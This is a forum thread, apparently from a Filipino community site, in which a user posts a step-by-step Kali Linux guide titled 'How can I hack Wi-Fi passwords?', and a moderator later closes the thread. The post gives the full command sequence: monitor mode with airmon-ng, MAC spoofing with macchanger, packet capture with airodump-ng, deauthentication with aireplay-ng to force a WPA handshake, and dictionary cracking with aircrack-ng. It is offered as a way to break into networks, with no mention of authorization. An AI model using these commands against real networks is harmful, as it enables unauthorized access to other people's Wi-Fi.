🔒 Closed How can I häçk Wi-Fi passwords?

  • Thread starter Thread starter Jeanh
  • Start date Start date
Status
Not open for further replies.
J

Jeanh

How can I häçk Wi-Fi passwords?

This is using kali-linux on Terminal. Bold letters are commands to be typed in Terminal

Step 1 : airmon-ng

The result will be something like :

Interface Chipset Driver
wlan0 Intel 5100 iwlagn - [phy0]

Step 2 : airmon-ng start wlan0

Step 3 (Optional) :
Change the mac address of the mon0 interface.

ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up

Step 4 : airodump-ng mon0

Then, press "Ctrl+c" to break the program.

Step 5 : airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff --ivs mon0

where
-c is the channel
-w is the file to be written
--bssid is the BSSID
Keep this terminal running.

Step 6 : open another terminal.
aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0

where -a is the BSSID
-c is the client MAC address (STATION)
Wait for the handshake.

Step 7 :
Use the John the Ripper as word list to crack the WPA/WP2 password.aircrack-ng -w /pentest/passwords/john/password.lst wpacrack-01.ivs

*^_^* para sa magagaling sa computer...
 
Dear @Jeanh,

Since 2 years have passed since the last reply in this thread, I am locking it to prevent necroposting. Feel free to start a new thread or contact any forum staff if you want this to be reopened.

Thread closed.
 
Status
Not open for further replies.

About this Thread

  • 1
    Replies
  • 509
    Views
  • 0
    Participants
Last reply from:
Unknown user

Trending Topics

Online now

Members online
978
Guests online
588
Total visitors
1,566

Forum statistics

Threads
2,279,459
Posts
28,990,879
Members
1,225,922
Latest member
papa dats
Back
Top